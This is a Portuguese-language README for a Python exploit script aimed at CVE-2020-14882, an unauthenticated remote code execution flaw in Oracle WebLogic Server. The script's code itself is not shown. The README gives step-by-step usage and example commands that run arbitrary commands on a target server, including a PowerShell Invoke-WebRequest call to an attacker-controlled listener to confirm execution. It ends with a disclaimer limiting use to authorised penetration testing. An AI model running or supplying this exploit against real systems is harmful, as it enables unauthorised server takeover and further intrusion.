
Este script permite a execução remota de código (RCE) no Oracle WebLogic Server.
Este script permite a execução remota de código (RCE) no Oracle WebLogic Server usando uma requisição GET não autenticada. Ele explora a vulnerabilidade CVE-2020-14882. Ao executar comandos arbitrários, um atacante pode obter acesso não autorizado ao servidor.
Certifique-se de ter o Python 3 instalado. Para usar este script, siga os passos abaixo:
Abra um terminal ou prompt de comando.
Execute o script usando o seguinte comando:
python3 exploit.py http(s)://target:7001 command
Substitua http(s)://target:7001 pela URL alvo do Oracle WebLogic Server e command pelo comando desejado a ser executado.
Exemplo 1:
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
Este exemplo executa o comando nslookup your_Domain no servidor alvo.
Exemplo 2:
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
Este exemplo executa o comando PowerShell Invoke-WebRequest -Uri http://your_listener no servidor alvo.
Este script é destinado apenas para testes de penetração autorizados e fins de pesquisa em segurança. O uso não autorizado deste script para explorar sistemas sem o devido consentimento é ilegal e pode resultar em consequências legais. Use por sua conta e risco.
Este script requer as seguintes dependências:
requestsurllib3Por favor, certifique-se de que essas dependências estejam instaladas antes de executar o script.